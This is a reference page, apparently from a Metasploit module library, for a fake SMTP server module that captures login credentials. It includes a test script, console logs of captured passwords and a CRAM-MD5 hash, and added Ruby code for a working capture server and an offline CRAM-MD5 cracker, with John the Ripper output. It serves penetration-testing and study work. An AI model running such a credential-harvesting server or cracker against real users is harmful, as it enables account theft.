Authentication Capture: SMTP - Metasploit
This page contains detailed information about how to use the auxiliary/server/capture/smtp metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Authentication Capture: SMTP
Module: auxiliary/server/capture/smtp
Source code: modules/auxiliary/server/capture/smtp.rb
Disclosure date: -
Last modification time: 2020-07-11 17:30:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module provides a fake SMTP service that is designed to capture authentication credentials.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/server/capture/smtp
msf auxiliary(smtp) > show targets
... a list of targets ...
msf auxiliary(smtp) > set TARGET target-id
msf auxiliary(smtp) > show options
... show and set options ...
msf auxiliary(smtp) > exploit
Knowledge Base
Vulnerable Application
This module creates a mock SMTP server which accepts SMTP AUTH credentials (PLAIN, LOGIN and CRAM-MD5 are exercised by the test script below) or unauthenticated email before throwing a 503 error.
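As an added example (not the module's own code), the following Ruby state machine shows how a capture server of this kind turns AUTH PLAIN and AUTH LOGIN exchanges into plaintext credentials: the PLAIN initial response is base64 of authzid, authcid and password separated by NUL bytes, and LOGIN is two base64 prompts. The reply codes, the port and the serve helper are assumptions chosen so the client believes the login succeeded; the sample client lines are the base64 strings that appear in the test output below, and CRAM-MD5 is handled in the cracking section further down.

```ruby
require 'socket'

# Added example in the spirit of auxiliary/server/capture/smtp; it is not
# the module's code. Reply strings are assumptions: they are what a client
# expects to see so that it hands over the credential and carries on.
class SmtpAuthCapture
  Reply = Struct.new(:text, :cred) # cred is [user, password] or nil

  def initialize
    @state = :command # :command, :plain, :login_user, :login_pass
    @user = nil
  end

  def banner
    "220 mail ready\r\n"
  end

  # Feed one client line (with or without CRLF); get the server reply and
  # any credential recovered from that line.
  def handle(line)
    line = line.chomp
    case @state
    when :plain # client sent "AUTH PLAIN" with no initial response
      @state = :command
      return plain_credential(line)
    when :login_user # base64 username answering "334 VXNlcm5hbWU6" (Username:)
      @user = line.unpack1('m')
      @state = :login_pass
      return Reply.new("334 UGFzc3dvcmQ6\r\n", nil) # Password:
    when :login_pass # base64 password
      @state = :command
      return Reply.new("235 2.7.0 Authentication successful\r\n", [@user, line.unpack1('m')])
    end

    verb, arg = line.split(' ', 2)
    case verb.to_s.upcase
    when 'EHLO', 'HELO'
      Reply.new("250-localhost\r\n250 AUTH PLAIN LOGIN\r\n", nil)
    when 'AUTH'
      mech, initial = arg.to_s.split(' ', 2)
      case mech.to_s.upcase
      when 'PLAIN'
        if initial.nil? || initial.empty?
          @state = :plain
          Reply.new("334 \r\n", nil)
        else
          plain_credential(initial)
        end
      when 'LOGIN'
        @state = :login_user
        Reply.new("334 VXNlcm5hbWU6\r\n", nil) # Username:
      else
        Reply.new("503 Server Error\r\n", nil) # mechanism not handled in this example
      end
    when 'QUIT'
      Reply.new("221 Bye\r\n", nil)
    else
      Reply.new("503 Server Error\r\n", nil)
    end
  end

  private

  # RFC 4616 PLAIN message: base64("authzid\0authcid\0password"); authzid is usually empty.
  def plain_credential(b64)
    _authz, user, pass = b64.unpack1('m').split("\0", 3)
    return Reply.new("535 5.7.8 Authentication credentials invalid\r\n", nil) if user.nil? || pass.nil?

    Reply.new("235 2.7.0 Authentication successful\r\n", [user, pass])
  end
end

# Serve clients one at a time on an assumed high port and print what the
# state machine recovers, in the same shape the module's "[+] SMTP LOGIN" line uses.
def serve(port)
  server = TCPServer.new('127.0.0.1', port)
  loop do
    client = server.accept
    capture = SmtpAuthCapture.new
    client.write(capture.banner)
    while (line = client.gets)
      reply = capture.handle(line)
      puts "[+] SMTP LOGIN #{client.peeraddr[3]} #{reply.cred.join(' / ')}" if reply.cred
      client.write(reply.text)
      break if line.strip.upcase.start_with?('QUIT')
    end
    client.close
  end
end

serve(2525) if $0 == __FILE__ && ARGV.first == '--serve'
```

Run it with `ruby smtp_capture_example.rb --serve` and point the page's test script at port 2525 instead of 25 (the port is an assumption; 25 needs root) to see the same decoded user / password pairs the module prints.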
Verification Steps
- Start msfconsole
- Do:
use auxiliary/server/capture/smtp
- Do:
run
Scenarios
Testing Script
The following script should test the following:
- Auth Plain
- Auth Login
- Auth CRAM-MD5
- Sending an email w/o auth
- RSET during DATA, as implemented for https://github.com/rapid7/metasploit-framework/issues/11980
require 'net/smtp'
require 'socket'

puts 'Testing: plain'
begin
  Net::SMTP.start('127.0.0.1', 25, 'localhost', 'username_plain', 'password_plain', :plain)
rescue => e
  puts "Error: #{e}"
end

puts 'Testing: login'
begin
  Net::SMTP.start('127.0.0.1', 25, 'localhost', 'username_login', 'password_login', :login)
rescue => e
  puts "Error: #{e}"
end

puts 'Testing: cram md5'
begin
  Net::SMTP.start('127.0.0.1', 25, 'localhost', 'username_cram', 'password_cram', :cram_md5)
rescue => e
  puts "Error: #{e}"
end

puts 'Testing: DATA'
begin
  Net::SMTP.start('127.0.0.1') do |smtp|
    smtp.send_message 'test', '[email protected]', '[email protected]'
  end
rescue => e
  puts "Error: #{e}"
end

# test for https://github.com/rapid7/metasploit-framework/issues/11980
puts 'Testing: RSET during DATA'
begin
  t = TCPSocket.open('127.0.0.1', 25)
  t.gets
  t.print("EHLO localhost \r\n")
  t.gets
  t.print("MAIL FROM: \r\n")
  t.gets
  t.print("MAIL TO: \r\n")
  t.gets
  t.print("DATA\r\n")
  t.gets
  t.print("RSET\r\n")
  puts " Response: #{t.gets.chop}"
rescue => e
  puts "Error: #{e}"
end

puts 'Testing: RSET during middle of DATA'
begin
  t = TCPSocket.open('127.0.0.1', 25)
  t.gets
  t.print("EHLO localhost \r\n")
  t.gets
  t.print("MAIL FROM: \r\n")
  t.gets
  t.print("MAIL TO: \r\n")
  t.gets
  t.print("DATA\r\n")
  t.gets
  t.print("testing a message which gets cancelled\r\n")
  t.print("RSET\r\n")
  puts " Response: #{t.gets.chop}"
rescue => e
  puts "Error: #{e}"
end
Output from testing script
When this script is run from the Metasploit console, its output is interleaved with the module's own output, which makes it easy to match each test to what the server captured:
$ sudo ./msfconsole -qx 'use auxiliary/server/capture/smtp; set srvhost 127.0.0.1;run;ruby tools/dev/test_capture_smtp.rb'
srvhost => 127.0.0.1
[*] Auxiliary module running as background job 0.
[*] exec: ruby tools/dev/test_capture_smtp.rb
[*] Started service listener on 127.0.0.1:25
[*] Server started.
Testing: plain
[*] SMTP: 127.0.0.1:46212 Command: EHLO localhost
[*] SMTP: 127.0.0.1:46212 Command: AUTH PLAIN AHVzZXJuYW1lX3BsYWluAHBhc3N3b3JkX3BsYWlu
[+] SMTP LOGIN 127.0.0.1:46212 username_plain / password_plain
Testing: login
[*] SMTP: 127.0.0.1:46214 Command: EHLO localhost
[*] SMTP: 127.0.0.1:46214 Command: AUTH LOGIN
[*] SMTP: 127.0.0.1:46214 Command: dXNlcm5hbWVfbG9naW4=
[*] SMTP: 127.0.0.1:46214 Command: cGFzc3dvcmRfbG9naW4=
[+] SMTP LOGIN 127.0.0.1:46214 username_login / password_login
Testing: cram md5
[*] SMTP: 127.0.0.1:46216 Command: EHLO localhost
[*] SMTP: 127.0.0.1:46216 Command: AUTH CRAM-MD5
[*] SMTP: 127.0.0.1:46216 Command: dXNlcm5hbWVfY3JhbSA3YjA2NzUyMjVhM2FjMmI5MjMxYzJlOTM5OTg2Y2U0Mg==
Testing: DATA
[+] SMTP LOGIN 127.0.0.1:46216 username_cram / <[email protected]>#7b0675225a3ac2b9231c2e939986ce42
[*] SMTP: 127.0.0.1:46218 Command: EHLO localhost
[*] SMTP: 127.0.0.1:46218 Command: MAIL FROM:
[*] SMTP: 127.0.0.1:46218 Command: RCPT TO:
[*] SMTP: 127.0.0.1:46218 Command: DATA
[*] SMTP: 127.0.0.1:46218 Command: test
.
[*] SMTP: 127.0.0.1:46218 EMAIL: test
[*] SMTP: 127.0.0.1:46218 Command: QUIT
Testing: RSET during DATA
[*] SMTP: 127.0.0.1:46220 Command: EHLO localhost
[*] SMTP: 127.0.0.1:46220 Command: MAIL FROM:
[*] SMTP: 127.0.0.1:46220 Command: MAIL TO:
[*] SMTP: 127.0.0.1:46220 Command: DATA
[*] SMTP: 127.0.0.1:46220 Command: RSET
Response: 250 OK
Testing: RSET during middle of DATA
[*] SMTP: 127.0.0.1:46222 Command: EHLO localhost
[*] SMTP: 127.0.0.1:46222 Command: MAIL FROM:
[*] SMTP: 127.0.0.1:46222 Command: MAIL TO:
[*] SMTP: 127.0.0.1:46222 Command: DATA
[*] SMTP: 127.0.0.1:46222 Command: testing a message which gets cancelled
RSET
[*] SMTP: 127.0.0.1:46222 EMAIL: testing a message which gets cancelled
Response: 250 OK
msf5 auxiliary(server/capture/smtp) > creds
Credentials
===========
host origin service public private realm private_type JtR Format
---- ------ ------- ------ ------- ----- ------------ ----------
127.0.0.1 127.0.0.1 25/tcp (smtp) username_cram <[email protected]>#7b0675225a3ac2b9231c2e939986ce42 Nonreplayable hash hmac-md5
127.0.0.1 127.0.0.1 25/tcp (smtp) username_login password_login Password
127.0.0.1 127.0.0.1 25/tcp (smtp) username_plain password_plain Password
msf5 auxiliary(server/capture/smtp) > notes
Notes
=====
Time Host Service Port Protocol Type Data
---- ---- ------- ---- -------- ---- ----
2020-04-17 15:11:24 UTC 127.0.0.1 smtp_message "testing a message which gets cancelled\r\n"
Cracking CRAM-MD5 (hmac-md5)
Metasploit currently doesn't have a cracker for hmac-md5; however, the output is pre-formatted to JtR standards, and creds -o /tmp/file.jtr will export it correctly for John. It is also possible to export to hashcat format with creds -o /tmp/file.hcat and use hashcat mode 10200.
user@kali:~/metasploit-framework$ sudo cat /tmp/cram
username_cram:<[email protected]>#7b0675225a3ac2b9231c2e939986ce42
user@kali:~/metasploit-framework$ sudo cat /tmp/wordlist
password_cram
user@kali:~/metasploit-framework$ sudo john --wordlist=/tmp/wordlist --format=hmac-md5 /tmp/cram
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-MD5 [password is key, MD5 256/256 AVX2 8x3])
Warning: poor OpenMP scalability for this hash type, consider --fork=8
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 192 needed for performance.
password_cram (username_cram)
1g 0:00:00:00 DONE (2020-04-17 11:32) 50.00g/s 50.00p/s 50.00c/s 50.00C/s password_cram
Use the "--show --format=HMAC-MD5" options to display all of the cracked passwords reliably
Session completed
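To make the "Nonreplayable hash" label concrete, here is an added Ruby example (not Metasploit, John or hashcat code) that rebuilds a CRAM-MD5 exchange end to end: the digest is HMAC-MD5 keyed with the password over the server's challenge, so a captured response cannot be replayed against a different challenge, but a wordlist can be tried offline exactly as John does above. The challenge string, the user and the wordlist are constructed for this example (the page's own challenge is not reproduced); the JtR line shape (user:challenge#digest) is the one shown on this page and the hashcat line follows the documented -m 10200 format.

```ruby
require 'openssl'

# Added example, not Metasploit code. Constructed sample values.
SAMPLE_USER      = 'username_cram'
SAMPLE_CHALLENGE = '<1587136284.1234@capture.invalid>' # assumed server challenge
SAMPLE_PASSWORD  = 'password_cram'

# CRAM-MD5: the client proves knowledge of the password with
# HMAC-MD5(key = password, message = challenge), sent as lowercase hex.
def cram_md5_digest(challenge, password)
  OpenSSL::HMAC.hexdigest('MD5', password, challenge)
end

# What the client sends after the server's "334 base64(challenge)":
# base64("<user> <hexdigest>") - the AUTH CRAM-MD5 line seen in the test output.
def cram_md5_response(user, challenge, password)
  ["#{user} #{cram_md5_digest(challenge, password)}"].pack('m0')
end

# Split the client response into the user and digest a capture server stores.
def parse_cram_md5_response(b64)
  user, digest = b64.unpack1('m').split(' ', 2)
  raise ArgumentError, 'malformed CRAM-MD5 response' unless digest.to_s.match?(/\A\h{32}\z/)

  [user, digest]
end

# The JtR hmac-md5 line shape shown on this page: user:challenge#digest
def jtr_line(user, challenge, digest)
  "#{user}:#{challenge}##{digest}"
end

# hashcat -m 10200 line: $cram_md5$base64(challenge)$base64("user digest")
def hashcat_line(challenge, response_b64)
  "$cram_md5$#{[challenge].pack('m0')}$#{response_b64}"
end

# Offline dictionary attack against one JtR line. Returns [user, password]
# or nil. The challenge is bound into every candidate digest, which is why
# the capture is a hash to crack rather than a credential to replay.
def crack_cram_md5(jtr, wordlist)
  user, rest = jtr.split(':', 2)
  challenge, _sep, digest = rest.rpartition('#') # challenge may itself contain '#'
  wordlist.each do |candidate|
    return [user, candidate] if cram_md5_digest(challenge, candidate).casecmp?(digest)
  end
  nil
end

if $0 == __FILE__
  response = cram_md5_response(SAMPLE_USER, SAMPLE_CHALLENGE, SAMPLE_PASSWORD)
  user, digest = parse_cram_md5_response(response)
  line = jtr_line(user, SAMPLE_CHALLENGE, digest)
  puts "JtR:     #{line}"
  puts "hashcat: #{hashcat_line(SAMPLE_CHALLENGE, response)}"
  p crack_cram_md5(line, %w[letmein hunter2 password_cram]) # constructed wordlist
end
```

Because the server picks the challenge, a capture server that always issues the same challenge would make two captures of the same password comparable but still not replayable against a real server, which chooses its own; the only way to turn the capture into a usable credential is the offline guess shown in crack_cram_md5.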
Msfconsole Usage
Here is how the server/capture/smtp auxiliary module looks in the msfconsole:
msf6 > use auxiliary/server/capture/smtp
msf6 auxiliary(server/capture/smtp) > show info
Name: Authentication Capture: SMTP
Module: auxiliary/server/capture/smtp
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
ddz <[email protected]>
hdm <[email protected]>
h00die
Available actions:
Name Description
---- -----------
Capture Run SMTP capture server
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 25 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Description:
This module provides a fake SMTP service that is designed to capture
authentication credentials.
References:
https://www.samlogic.net/articles/smtp-commands-reference-auth.htm
tools.ietf.org/html/rfc5321
http://fehcom.de/qmail/smtpauth.html
Module Options
This is a complete list of options available in the server/capture/smtp auxiliary module:
msf6 auxiliary(server/capture/smtp) > show options
Module options (auxiliary/server/capture/smtp):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 25 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
Auxiliary action:
Name Description
---- -----------
Capture Run SMTP capture server
Advanced Options
Here is a complete list of advanced options supported by the server/capture/smtp auxiliary module:
msf6 auxiliary(server/capture/smtp) > show advanced
Module advanced options (auxiliary/server/capture/smtp):
Name Current Setting Required Description
---- --------------- -------- -----------
ListenerComm no The specific communication channel to use for this service
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the server/capture/smtp module can do:
msf6 auxiliary(server/capture/smtp) > show actions
Auxiliary actions:
Name Description
---- -----------
Capture Run SMTP capture server
Evasion Options
Here is the full list of possible evasion options supported by the server/capture/smtp auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(server/capture/smtp) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often help in identifying the root cause of the problem.
Unknown authentication type string: <ARG>
Here is a relevant code snippet related to the "Unknown authentication type string: <ARG>" error message:
241: @state[client][:auth_cram] = true
242: @state[client][:auth_cram_challenge] = challenge
243: return
244: end
245: # some other auth we dont understand
246: vprint_error("Unknown authentication type string: #{arg}")
247: client.put "503 Server Error\r\n"
248: else
249: vprint_error("Unknown command: #{arg}")
250: end
251: client.put "503 Server Error\r\n"
503 Server Error\r\n
Here is a relevant code snippet related to the "503 Server Error\r\n" message (this is the reply the module sends to the client, not an error printed in the console):
242: @state[client][:auth_cram_challenge] = challenge
243: return
244: end
245: # some other auth we dont understand
246: vprint_error("Unknown authentication type string: #{arg}")
247: client.put "503 Server Error\r\n"
248: else
249: vprint_error("Unknown command: #{arg}")
250: end
251: client.put "503 Server Error\r\n"
252:
Unknown command: <ARG>
Here is a relevant code snippet related to the "Unknown command: <ARG>" error message:
244: end
245: # some other auth we dont understand
246: vprint_error("Unknown authentication type string: #{arg}")
247: client.put "503 Server Error\r\n"
248: else
249: vprint_error("Unknown command: #{arg}")
250: end
251: client.put "503 Server Error\r\n"
252:
253: end
254:
503 Server Error\r\n
Here is a relevant code snippet related to the "503 Server Error\r\n" message (this is the reply the module sends to the client, not an error printed in the console):
246: vprint_error("Unknown authentication type string: #{arg}")
247: client.put "503 Server Error\r\n"
248: else
249: vprint_error("Unknown command: #{arg}")
250: end
251: client.put "503 Server Error\r\n"
252:
253: end
254:
255: def report_cred(opts)
256: service_data = {
Related Pull Requests
- #13271 Merged Pull Request: aux/server/capture/smtp now captures auth!
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #9897 Merged Pull Request: Fix #8404 ListenerComm Support For Exploit::Remote::TcpServer
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5768 Merged Pull Request: Update modules to use metasploit-credential instead of report_auth_info
- #2525 Merged Pull Request: Change module boilerplate
- #1228 Merged Pull Request: MSFTIDY cleanup #1 - auxiliary
References
- CVE: Not available
- https://www.samlogic.net/articles/smtp-commands-reference-auth.htm
- tools.ietf.org/html/rfc5321
- http://fehcom.de/qmail/smtpauth.html
See Also
Check also the following modules related to this module:
- auxiliary/client/smtp/emailer
- auxiliary/dos/smtp/sendmail_prescan
- auxiliary/dos/windows/smtp/ms06_019_exchange
- auxiliary/fuzzers/smtp/smtp_fuzzer
- auxiliary/scanner/http/smt_ipmi_49152_exposure
- auxiliary/scanner/http/smt_ipmi_cgi_scanner
- auxiliary/scanner/http/smt_ipmi_static_cert_scanner
- auxiliary/scanner/http/wp_easy_wp_smtp
- auxiliary/scanner/smtp/smtp_enum
- auxiliary/scanner/smtp/smtp_ntlm_domain
- auxiliary/scanner/smtp/smtp_relay
- auxiliary/scanner/smtp/smtp_version
- exploit/linux/http/smt_ipmi_close_window_bof
- exploit/linux/smtp/apache_james_exec
- exploit/linux/smtp/exim4_dovecot_exec
- exploit/linux/smtp/exim_gethostbyname_bof
- exploit/linux/smtp/haraka
- exploit/unix/local/opensmtpd_oob_read_lpe
- exploit/unix/smtp/clamav_milter_blackhole
- exploit/unix/smtp/exim4_string_format
- exploit/unix/smtp/morris_sendmail_debug
- exploit/unix/smtp/opensmtpd_mail_from_rce
- exploit/unix/smtp/qmail_bash_env_exec
- exploit/windows/smtp/mailcarrier_smtp_ehlo
- exploit/windows/smtp/mercury_cram_md5
- exploit/windows/smtp/ms03_046_exchange2000_xexch50
- exploit/windows/smtp/njstar_smtp_bof
- exploit/windows/smtp/sysgauge_client_bof
- exploit/windows/smtp/wmailserver
- exploit/windows/smtp/ypops_overflow1
- auxiliary/scanner/ipmi/ipmi_cipher_zero
- auxiliary/scanner/ipmi/ipmi_dumphashes
- auxiliary/scanner/ipmi/ipmi_version
Authors
- ddz
- hdm
- h00die
Version
This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.